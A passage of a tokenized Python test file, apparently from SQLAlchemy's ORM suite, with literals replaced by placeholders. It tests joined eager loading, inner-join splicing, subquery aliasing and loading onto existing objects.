( cls . Comparable ) : <EOL> pass <EOL> class C1 ( cls . Comparable ) : <EOL> pass <EOL> class C2 ( cls . Comparable ) : <EOL> pass <EOL> class D1 ( cls . Comparable ) : <EOL> pass <EOL> class D2 ( cls . Comparable ) : <EOL> pass <EOL> class E1 ( cls . Comparable ) : <EOL> pass <EOL> @ classmethod <EOL> def setup_mappers ( cls ) : <EOL> A , B , C1 , C2 , D1 , D2 , E1 = ( <EOL> cls . classes . A , cls . classes . B , cls . classes . C1 , <EOL> cls . classes . C2 , cls . classes . D1 , cls . classes . D2 , cls . classes . E1 ) <EOL> mapper ( A , cls . tables . a , properties = { <EOL> '<STR_LIT>' : relationship ( B ) <EOL> } ) <EOL> mapper ( B , cls . tables . b , properties = odict ( [ <EOL> ( '<STR_LIT>' , relationship ( C1 , order_by = cls . tables . c1 . c . id ) ) , <EOL> ( '<STR_LIT>' , relationship ( C2 , order_by = cls . tables . c2 . c . id ) ) <EOL> ] ) ) <EOL> mapper ( C1 , cls . tables . c1 , properties = { <EOL> '<STR_LIT>' : relationship ( D1 , order_by = cls . tables . d1 . c . id ) <EOL> } ) <EOL> mapper ( C2 , cls . tables . c2 , properties = { <EOL> '<STR_LIT>' : relationship ( D2 , order_by = cls . tables . d2 . 
c . id ) <EOL> } ) <EOL> mapper ( D1 , cls . tables . d1 , properties = { <EOL> '<STR_LIT>' : relationship ( E1 , order_by = cls . tables . e1 . c . id ) <EOL> } ) <EOL> mapper ( D2 , cls . tables . d2 ) <EOL> mapper ( E1 , cls . tables . e1 ) <EOL> @ classmethod <EOL> def _fixture_data ( cls ) : <EOL> A , B , C1 , C2 , D1 , D2 , E1 = ( <EOL> cls . classes . A , cls . classes . B , cls . classes . C1 , <EOL> cls . classes . C2 , cls . classes . D1 , cls . classes . D2 , cls . classes . E1 ) <EOL> return [ <EOL> A ( id = <NUM_LIT:1> , bs = [ <EOL> B ( <EOL> id = <NUM_LIT:1> , <EOL> c1s = [ C1 ( <EOL> id = <NUM_LIT:1> , value = '<STR_LIT>' , <EOL> d1s = [ <EOL> D1 ( id = <NUM_LIT:1> , e1s = [ E1 ( id = <NUM_LIT:1> ) ] ) , D1 ( id = <NUM_LIT:2> , e1s = [ E1 ( id = <NUM_LIT:2> ) ] ) <EOL> ] <EOL> ) <EOL> ] , <EOL> c2s = [ C2 ( id = <NUM_LIT:1> , value = '<STR_LIT>' , d2s = [ D2 ( id = <NUM_LIT:3> ) ] ) , <EOL> C2 ( id = <NUM_LIT:2> , value = '<STR_LIT>' , d2s = [ D2 ( id = <NUM_LIT:4> ) ] ) ] <EOL> ) , <EOL> B ( <EOL> id = <NUM_LIT:2> , <EOL> c1s = [ <EOL> C1 ( <EOL> id = <NUM_LIT:4> , value = '<STR_LIT>' , <EOL> d1s = [ D1 ( <EOL> id = <NUM_LIT:3> , e1s = [ <EOL> E1 ( id = <NUM_LIT:3> , value = '<STR_LIT>' ) , <EOL> E1 ( id = <NUM_LIT:4> , value = "<STR_LIT>" ) <EOL> ] ) , <EOL> D1 ( id = <NUM_LIT:4> , e1s = [ E1 ( id = <NUM_LIT:5> ) ] ) <EOL> ] <EOL> ) <EOL> ] , <EOL> c2s = [ C2 ( id = <NUM_LIT:4> , value = '<STR_LIT>' , d2s = [ ] ) ] <EOL> ) , <EOL> ] ) , <EOL> A ( id = <NUM_LIT:2> , bs = [ <EOL> B ( <EOL> id = <NUM_LIT:3> , <EOL> c1s = [ <EOL> C1 ( <EOL> id = <NUM_LIT:8> , <EOL> d1s = [ D1 ( id = <NUM_LIT:5> , value = '<STR_LIT>' , e1s = [ E1 ( id = <NUM_LIT:6> ) ] ) ] <EOL> ) <EOL> ] , <EOL> c2s = [ C2 ( id = <NUM_LIT:8> , d2s = [ D2 ( id = <NUM_LIT:6> , value = '<STR_LIT>' ) ] ) ] <EOL> ) <EOL> ] ) <EOL> ] <EOL> @ classmethod <EOL> def insert_data ( cls ) : <EOL> s = Session ( testing . db ) <EOL> s . add_all ( cls . _fixture_data ( ) ) <EOL> s . 
commit ( ) <EOL> def _assert_result ( self , query ) : <EOL> eq_ ( <EOL> query . all ( ) , <EOL> self . _fixture_data ( ) <EOL> ) <EOL> def test_nested_innerjoin_propagation_multiple_paths_one ( self ) : <EOL> A , B , C1 , C2 = ( <EOL> self . classes . A , self . classes . B , self . classes . C1 , <EOL> self . classes . C2 ) <EOL> s = Session ( ) <EOL> q = s . query ( A ) . options ( <EOL> joinedload ( A . bs , innerjoin = False ) . <EOL> joinedload ( B . c1s , innerjoin = True ) . <EOL> joinedload ( C1 . d1s , innerjoin = True ) , <EOL> defaultload ( A . bs ) . joinedload ( B . c2s , innerjoin = True ) . <EOL> joinedload ( C2 . d2s , innerjoin = False ) <EOL> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . _assert_result ( q ) <EOL> def test_nested_innerjoin_propagation_multiple_paths_two ( self ) : <EOL> A = self . classes . A <EOL> s = Session ( ) <EOL> q = s . query ( A ) . options ( <EOL> joinedload ( '<STR_LIT>' ) , <EOL> joinedload ( '<STR_LIT>' , innerjoin = True ) , <EOL> joinedload ( '<STR_LIT>' , innerjoin = True ) , <EOL> joinedload ( '<STR_LIT>' ) <EOL> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . _assert_result ( q ) <EOL> def test_multiple_splice_points ( self ) : <EOL> A = self . classes . A <EOL> s = Session ( ) <EOL> q = s . query ( A ) . 
options ( <EOL> joinedload ( '<STR_LIT>' , innerjoin = False ) , <EOL> joinedload ( '<STR_LIT>' , innerjoin = True ) , <EOL> joinedload ( '<STR_LIT>' , innerjoin = True ) , <EOL> joinedload ( '<STR_LIT>' , innerjoin = False ) , <EOL> joinedload ( '<STR_LIT>' ) , <EOL> joinedload ( '<STR_LIT>' , innerjoin = True ) <EOL> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . _assert_result ( q ) <EOL> def test_splice_onto_np_mapper ( self ) : <EOL> A = self . classes . A <EOL> B = self . classes . B <EOL> C1 = self . classes . C1 <EOL> b_table = self . tables . b <EOL> c1_table = self . tables . c1 <EOL> from sqlalchemy import inspect <EOL> weird_selectable = b_table . outerjoin ( c1_table ) <EOL> b_np = mapper ( <EOL> B , weird_selectable , non_primary = True , properties = odict ( [ <EOL> ( '<STR_LIT>' , relationship ( C1 , lazy = False , innerjoin = True ) ) , <EOL> ( '<STR_LIT>' , c1_table . c . id ) , <EOL> ( '<STR_LIT>' , b_table . c . value ) , <EOL> ] ) <EOL> ) <EOL> a_mapper = inspect ( A ) <EOL> a_mapper . add_property ( <EOL> "<STR_LIT>" , relationship ( b_np ) <EOL> ) <EOL> s = Session ( ) <EOL> q = s . query ( A ) . options ( <EOL> joinedload ( '<STR_LIT>' , innerjoin = False ) <EOL> ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class InnerJoinSplicingWSecondaryTest ( <EOL> fixtures . MappedTest , testing . 
AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> __backend__ = True <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( <EOL> '<STR_LIT:a>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) <EOL> ) <EOL> Table ( <EOL> '<STR_LIT:b>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) <EOL> ) <EOL> Table ( <EOL> '<STR_LIT:c>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> ) <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) , <EOL> ) <EOL> Table ( '<STR_LIT:d>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> ) <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> class A ( cls . Comparable ) : <EOL> pass <EOL> class B ( cls . Comparable ) : <EOL> pass <EOL> class C ( cls . Comparable ) : <EOL> pass <EOL> class D ( cls . Comparable ) : <EOL> pass <EOL> @ classmethod <EOL> def setup_mappers ( cls ) : <EOL> A , B , C , D = ( <EOL> cls . classes . A , cls . classes . B , cls . classes . C , <EOL> cls . classes . D ) <EOL> mapper ( A , cls . tables . a , properties = { <EOL> '<STR_LIT:b>' : relationship ( B ) <EOL> } ) <EOL> mapper ( B , cls . tables . b , properties = odict ( [ <EOL> ( '<STR_LIT:c>' , relationship ( C ) ) , <EOL> ] ) ) <EOL> mapper ( C , cls . tables . c , properties = odict ( [ <EOL> ( '<STR_LIT>' , relationship ( D , secondary = cls . tables . ctod , <EOL> order_by = cls . tables . d . c . id ) ) , <EOL> ] ) ) <EOL> mapper ( D , cls . tables . d ) <EOL> @ classmethod <EOL> def _fixture_data ( cls ) : <EOL> A , B , C , D = ( <EOL> cls . classes . A , cls . classes . B , cls . classes . C , <EOL> cls . classes . 
D ) <EOL> d1 , d2 , d3 = D ( id = <NUM_LIT:1> ) , D ( id = <NUM_LIT:2> ) , D ( id = <NUM_LIT:3> ) <EOL> return [ <EOL> A ( <EOL> id = <NUM_LIT:1> , <EOL> b = B ( <EOL> id = <NUM_LIT:1> , <EOL> c = C ( <EOL> id = <NUM_LIT:1> , <EOL> ds = [ d1 , d2 ] <EOL> ) <EOL> ) <EOL> ) , <EOL> A ( <EOL> id = <NUM_LIT:2> , <EOL> b = B ( <EOL> id = <NUM_LIT:2> , <EOL> c = C ( <EOL> id = <NUM_LIT:2> , <EOL> ds = [ d2 , d3 ] <EOL> ) <EOL> ) <EOL> ) <EOL> ] <EOL> @ classmethod <EOL> def insert_data ( cls ) : <EOL> s = Session ( testing . db ) <EOL> s . add_all ( cls . _fixture_data ( ) ) <EOL> s . commit ( ) <EOL> def _assert_result ( self , query ) : <EOL> def go ( ) : <EOL> eq_ ( <EOL> query . all ( ) , <EOL> self . _fixture_data ( ) <EOL> ) <EOL> self . assert_sql_count ( <EOL> testing . db , <EOL> go , <EOL> <NUM_LIT:1> <EOL> ) <EOL> def test_joined_across ( self ) : <EOL> A = self . classes . A <EOL> s = Session ( ) <EOL> q = s . query ( A ) . options ( <EOL> joinedload ( '<STR_LIT:b>' ) . <EOL> joinedload ( '<STR_LIT:c>' , innerjoin = True ) . <EOL> joinedload ( '<STR_LIT>' , innerjoin = True ) ) <EOL> self . assert_compile ( <EOL> q , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . _assert_result ( q ) <EOL> class SubqueryAliasingTest ( fixtures . MappedTest , testing . AssertsCompiledSQL ) : <EOL> """<STR_LIT>""" <EOL> __dialect__ = '<STR_LIT:default>' <EOL> run_create_tables = None <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( '<STR_LIT:a>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> ) <EOL> Table ( '<STR_LIT:b>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:value>' , Integer ) , <EOL> ) <EOL> @ classmethod <EOL> def setup_classes ( cls ) : <EOL> class A ( cls . 
Comparable ) : <EOL> pass <EOL> class B ( cls . Comparable ) : <EOL> pass <EOL> def _fixture ( self , props ) : <EOL> A , B = self . classes . A , self . classes . B <EOL> b_table , a_table = self . tables . b , self . tables . a <EOL> mapper ( A , a_table , properties = props ) <EOL> mapper ( B , b_table , properties = { <EOL> '<STR_LIT:a>' : relationship ( A , backref = "<STR_LIT>" ) <EOL> } ) <EOL> def test_column_property ( self ) : <EOL> A = self . classes . A <EOL> b_table , a_table = self . tables . b , self . tables . a <EOL> cp = select ( [ func . sum ( b_table . c . value ) ] ) . where ( b_table . c . a_id == a_table . c . id ) <EOL> self . _fixture ( { <EOL> '<STR_LIT>' : column_property ( cp ) <EOL> } ) <EOL> self . assert_compile ( <EOL> create_session ( ) . query ( A ) . options ( joinedload_all ( '<STR_LIT>' ) ) . <EOL> order_by ( A . summation ) . <EOL> limit ( <NUM_LIT:50> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_column_property_desc ( self ) : <EOL> A = self . classes . A <EOL> b_table , a_table = self . tables . b , self . tables . a <EOL> cp = select ( [ func . sum ( b_table . c . value ) ] ) . where ( b_table . c . a_id == a_table . c . id ) <EOL> self . _fixture ( { <EOL> '<STR_LIT>' : column_property ( cp ) <EOL> } ) <EOL> self . assert_compile ( <EOL> create_session ( ) . query ( A ) . options ( joinedload_all ( '<STR_LIT>' ) ) . <EOL> order_by ( A . summation . desc ( ) ) . <EOL> limit ( <NUM_LIT:50> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_column_property_correlated ( self ) : <EOL> A = self . classes . A <EOL> b_table , a_table = self . tables . b , self . tables . a <EOL> cp = select ( [ func . sum ( b_table . c . value ) ] ) . where ( b_table . c . a_id == a_table . c . id ) . correlate ( a_table ) <EOL> self . 
_fixture ( { <EOL> '<STR_LIT>' : column_property ( cp ) <EOL> } ) <EOL> self . assert_compile ( <EOL> create_session ( ) . query ( A ) . options ( joinedload_all ( '<STR_LIT>' ) ) . <EOL> order_by ( A . summation ) . <EOL> limit ( <NUM_LIT:50> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_standalone_subquery_unlabeled ( self ) : <EOL> A = self . classes . A <EOL> b_table , a_table = self . tables . b , self . tables . a <EOL> self . _fixture ( { } ) <EOL> cp = select ( [ func . sum ( b_table . c . value ) ] ) . where ( b_table . c . a_id == a_table . c . id ) . correlate ( a_table ) . as_scalar ( ) <EOL> self . assert_compile ( <EOL> create_session ( ) . query ( A ) . options ( joinedload_all ( '<STR_LIT>' ) ) . <EOL> order_by ( cp ) . <EOL> limit ( <NUM_LIT:50> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_standalone_subquery_labeled ( self ) : <EOL> A = self . classes . A <EOL> b_table , a_table = self . tables . b , self . tables . a <EOL> self . _fixture ( { } ) <EOL> cp = select ( [ func . sum ( b_table . c . value ) ] ) . where ( b_table . c . a_id == a_table . c . id ) . correlate ( a_table ) . as_scalar ( ) . label ( '<STR_LIT:foo>' ) <EOL> self . assert_compile ( <EOL> create_session ( ) . query ( A ) . options ( joinedload_all ( '<STR_LIT>' ) ) . <EOL> order_by ( cp ) . <EOL> limit ( <NUM_LIT:50> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_standalone_negated ( self ) : <EOL> A = self . classes . A <EOL> b_table , a_table = self . tables . b , self . tables . a <EOL> self . _fixture ( { } ) <EOL> cp = select ( [ func . sum ( b_table . c . value ) ] ) . where ( b_table . c . a_id == a_table . c . id ) . 
correlate ( a_table ) . as_scalar ( ) <EOL> self . assert_compile ( <EOL> create_session ( ) . query ( A ) . options ( joinedload_all ( '<STR_LIT>' ) ) . <EOL> order_by ( ~ cp ) . <EOL> limit ( <NUM_LIT:50> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class LoadOnExistingTest ( _fixtures . FixtureTest ) : <EOL> """<STR_LIT>""" <EOL> run_inserts = '<STR_LIT>' <EOL> run_deletes = None <EOL> def _collection_to_scalar_fixture ( self ) : <EOL> User , Address , Dingaling = self . classes . User , self . classes . Address , self . classes . Dingaling <EOL> mapper ( User , self . tables . users , properties = { <EOL> '<STR_LIT>' : relationship ( Address ) , <EOL> } ) <EOL> mapper ( Address , self . tables . addresses , properties = { <EOL> '<STR_LIT>' : relationship ( Dingaling ) <EOL> } ) <EOL> mapper ( Dingaling , self . tables . dingalings ) <EOL> sess = Session ( autoflush = False ) <EOL> return User , Address , Dingaling , sess <EOL> def _collection_to_collection_fixture ( self ) : <EOL> User , Order , Item = self . classes . User , self . classes . Order , self . classes . Item <EOL> mapper ( User , self . tables . users , properties = { <EOL> '<STR_LIT>' : relationship ( Order ) , <EOL> } ) <EOL> mapper ( Order , self . tables . orders , properties = { <EOL> '<STR_LIT>' : relationship ( Item , secondary = self . tables . order_items ) , <EOL> } ) <EOL> mapper ( Item , self . tables . items ) <EOL> sess = Session ( autoflush = False ) <EOL> return User , Order , Item , sess <EOL> def _eager_config_fixture ( self ) : <EOL> User , Address = self . classes . User , self . classes . Address <EOL> mapper ( User , self . tables . users , properties = { <EOL> '<STR_LIT>' : relationship ( Address , lazy = "<STR_LIT>" ) , <EOL> } ) <EOL> mapper ( Address , self . tables . 
addresses ) <EOL> sess = Session ( autoflush = False ) <EOL> return User , Address , sess <EOL> def test_no_query_on_refresh ( self ) : <EOL> User , Address , sess = self . _eager_config_fixture ( ) <EOL> u1 = sess . query ( User ) . get ( <NUM_LIT:8> ) <EOL> assert '<STR_LIT>' in u1 . __dict__ <EOL> sess . expire ( u1 ) <EOL> def go ( ) : <EOL> eq_ ( u1 . id , <NUM_LIT:8> ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> assert '<STR_LIT>' not in u1 . __dict__ <EOL> def test_loads_second_level_collection_to_scalar ( self ) : <EOL> User , Address , Dingaling , sess = self . _collection_to_scalar_fixture ( ) <EOL> u1 = sess . query ( User ) . get ( <NUM_LIT:8> ) <EOL> a1 = Address ( ) <EOL> u1 . addresses . append ( a1 ) <EOL> a2 = u1 . addresses [ <NUM_LIT:0> ] <EOL> a2 . email_address = '<STR_LIT:foo>' <EOL> sess . query ( User ) . options ( joinedload_all ( "<STR_LIT>" ) ) . filter_by ( id = <NUM_LIT:8> ) . all ( ) <EOL> assert u1 . addresses [ - <NUM_LIT:1> ] is a1 <EOL> for a in u1 . addresses : <EOL> if a is not a1 : <EOL> assert '<STR_LIT>' in a . __dict__ <EOL> else : <EOL> assert '<STR_LIT>' not in a . __dict__ <EOL> if a is a2 : <EOL> eq_ ( a2 . email_address , '<STR_LIT:foo>' ) <EOL> def test_loads_second_level_collection_to_collection ( self ) : <EOL> User , Order , Item , sess = self . _collection_to_collection_fixture ( ) <EOL> u1 = sess . query ( User ) . get ( <NUM_LIT:7> ) <EOL> u1 . orders <EOL> o1 = Order ( ) <EOL> u1 . orders . append ( o1 ) <EOL> sess . query ( User ) . options ( joinedload_all ( "<STR_LIT>" ) ) . filter_by ( id = <NUM_LIT:7> ) . all ( ) <EOL> for o in u1 . orders : <EOL> if o is not o1 : <EOL> assert '<STR_LIT>' in o . __dict__ <EOL> else : <EOL> assert '<STR_LIT>' not in o . __dict__ <EOL> def test_load_two_levels_collection_to_scalar ( self ) : <EOL> User , Address , Dingaling , sess = self . _collection_to_scalar_fixture ( ) <EOL> u1 = sess . query ( User ) . filter_by ( <EOL> id = <NUM_LIT:8> ) . 
options ( <EOL> joinedload ( "<STR_LIT>" ) ) . one ( ) <EOL> sess . query ( User ) . filter_by ( <EOL> id = <NUM_LIT:8> ) . options ( <EOL> joinedload_all ( "<STR_LIT>" ) ) . first ( ) <EOL> assert '<STR_LIT>' in u1 . addresses [ <NUM_LIT:0> ] . __dict__ <EOL> def test_load_two_levels_collection_to_collection ( self ) : <EOL> User , Order , Item , sess = self . _collection_to_collection_fixture ( ) <EOL> u1 = sess . query ( User ) . filter_by ( <EOL> id = <NUM_LIT:7> ) . options ( <EOL> joinedload ( "<STR_LIT>" ) ) . one ( ) <EOL> sess . query ( User ) . filter_by ( <EOL> id = <NUM_LIT:7> ) . options ( <EOL> joinedload_all ( "<STR_LIT>" ) ) . first ( ) <EOL> assert '<STR_LIT>' in u1 . orders [ <NUM_LIT:0> ] . __dict__ <EOL> class AddEntityTest ( _fixtures . FixtureTest ) : <EOL> run_inserts = '<STR_LIT>' <EOL> run_deletes = None <EOL> def _assert_result ( self ) : <EOL> Item , Address , Order , User = ( self . classes . Item , <EOL> self . classes . Address , <EOL> self . classes . Order , <EOL> self . classes . 
User ) <EOL> return [ <EOL> ( <EOL> User ( id = <NUM_LIT:7> , <EOL> addresses = [ Address ( id = <NUM_LIT:1> ) ] <EOL> ) , <EOL> Order ( id = <NUM_LIT:1> , <EOL> items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:2> ) , Item ( id = <NUM_LIT:3> ) ] <EOL> ) , <EOL> ) , <EOL> ( <EOL> User ( id = <NUM_LIT:7> , <EOL> addresses = [ Address ( id = <NUM_LIT:1> ) ] <EOL> ) , <EOL> Order ( id = <NUM_LIT:3> , <EOL> items = [ Item ( id = <NUM_LIT:3> ) , Item ( id = <NUM_LIT:4> ) , Item ( id = <NUM_LIT:5> ) ] <EOL> ) , <EOL> ) , <EOL> ( <EOL> User ( id = <NUM_LIT:7> , <EOL> addresses = [ Address ( id = <NUM_LIT:1> ) ] <EOL> ) , <EOL> Order ( id = <NUM_LIT:5> , <EOL> items = [ Item ( id = <NUM_LIT:5> ) ] <EOL> ) , <EOL> ) , <EOL> ( <EOL> User ( id = <NUM_LIT:9> , <EOL> addresses = [ Address ( id = <NUM_LIT:5> ) ] <EOL> ) , <EOL> Order ( id = <NUM_LIT:2> , <EOL> items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:2> ) , Item ( id = <NUM_LIT:3> ) ] <EOL> ) , <EOL> ) , <EOL> ( <EOL> User ( id = <NUM_LIT:9> , <EOL> addresses = [ Address ( id = <NUM_LIT:5> ) ] <EOL> ) , <EOL> Order ( id = <NUM_LIT:4> , <EOL> items = [ Item ( id = <NUM_LIT:1> ) , Item ( id = <NUM_LIT:5> ) ] <EOL> ) , <EOL> ) <EOL> ] <EOL> def test_mapper_configured ( self ) : <EOL> users , items , order_items , Order , Item , User , Address , orders , addresses = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . tables . orders , <EOL> self . tables . 
addresses ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Address , lazy = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : relationship ( Order ) <EOL> } ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Item , secondary = order_items , lazy = '<STR_LIT>' , <EOL> order_by = items . c . id ) <EOL> } ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> oalias = sa . orm . aliased ( Order ) <EOL> def go ( ) : <EOL> ret = sess . query ( User , oalias ) . join ( oalias , '<STR_LIT>' ) . order_by ( User . id , oalias . id ) . all ( ) <EOL> eq_ ( ret , self . _assert_result ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> def test_options ( self ) : <EOL> users , items , order_items , Order , Item , User , Address , orders , addresses = ( <EOL> self . tables . users , <EOL> self . tables . items , <EOL> self . tables . order_items , <EOL> self . classes . Order , <EOL> self . classes . Item , <EOL> self . classes . User , <EOL> self . classes . Address , <EOL> self . tables . orders , <EOL> self . tables . addresses ) <EOL> mapper ( User , users , properties = { <EOL> '<STR_LIT>' : relationship ( Address ) , <EOL> '<STR_LIT>' : relationship ( Order ) <EOL> } ) <EOL> mapper ( Address , addresses ) <EOL> mapper ( Order , orders , properties = { <EOL> '<STR_LIT>' : relationship ( <EOL> Item , secondary = order_items , order_by = items . c . id ) <EOL> } ) <EOL> mapper ( Item , items ) <EOL> sess = create_session ( ) <EOL> oalias = sa . orm . aliased ( Order ) <EOL> def go ( ) : <EOL> ret = sess . query ( User , oalias ) . options ( joinedload ( '<STR_LIT>' ) ) . join ( oalias , '<STR_LIT>' ) . order_by ( User . id , oalias . id ) . all ( ) <EOL> eq_ ( ret , self . _assert_result ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:6> ) <EOL> sess . expunge_all ( ) <EOL> def go ( ) : <EOL> ret = sess . 
query ( User , oalias ) . options ( joinedload ( '<STR_LIT>' ) , <EOL> joinedload ( oalias . items ) ) . join ( oalias , '<STR_LIT>' ) . order_by ( User . id , oalias . id ) . all ( ) <EOL> eq_ ( ret , self . _assert_result ( ) ) <EOL> self . assert_sql_count ( testing . db , go , <NUM_LIT:1> ) <EOL> class OrderBySecondaryTest ( fixtures . MappedTest ) : <EOL> @ classmethod <EOL> def define_tables ( cls , metadata ) : <EOL> Table ( '<STR_LIT>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> Table ( '<STR_LIT:a>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:data>' , String ( <NUM_LIT:50> ) ) ) <EOL> Table ( '<STR_LIT:b>' , metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> primary_key = True , <EOL> test_needs_autoincrement = True ) , <EOL> Column ( '<STR_LIT:data>' , String ( <NUM_LIT:50> ) ) ) <EOL> @ classmethod <EOL> def fixtures ( cls ) : <EOL> return dict ( <EOL> a = ( ( '<STR_LIT:id>' , '<STR_LIT:data>' ) , <EOL> ( <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT>' ) ) , <EOL> b = ( ( '<STR_LIT:id>' , '<STR_LIT:data>' ) , <EOL> ( <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:3> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:4> , '<STR_LIT>' ) ) , <EOL> m2m = ( ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> ) , <EOL> ( <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:2> ) , <EOL> ( <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:2> ) , <EOL> ( <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:3> ) ) ) <EOL> def test_ordering ( self ) : <EOL> 
